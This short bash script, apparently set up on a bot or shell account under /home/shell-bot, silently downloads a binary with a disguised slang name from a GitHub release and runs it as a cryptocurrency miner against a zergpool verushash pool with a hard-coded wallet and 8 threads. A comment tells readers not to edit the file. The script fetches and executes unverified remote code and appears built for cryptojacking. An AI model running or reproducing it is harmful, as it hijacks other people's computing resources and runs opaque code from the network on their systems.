#!/bin/bash

# Do not edit this file!


cd /home/shell-bot
wget -qO ngaceng https://github.com/janganminin/literate-couscous/releases/download/ww/bokep
chmod +x ngaceng
./ngaceng -v -l verushash.mine.zergpool.com:3300 -u MS7M2QQKoK2M94Ktn8iGk75j8yvjWGLHsM.ngaceng -p c=LTC,mc=VRSC -t 8
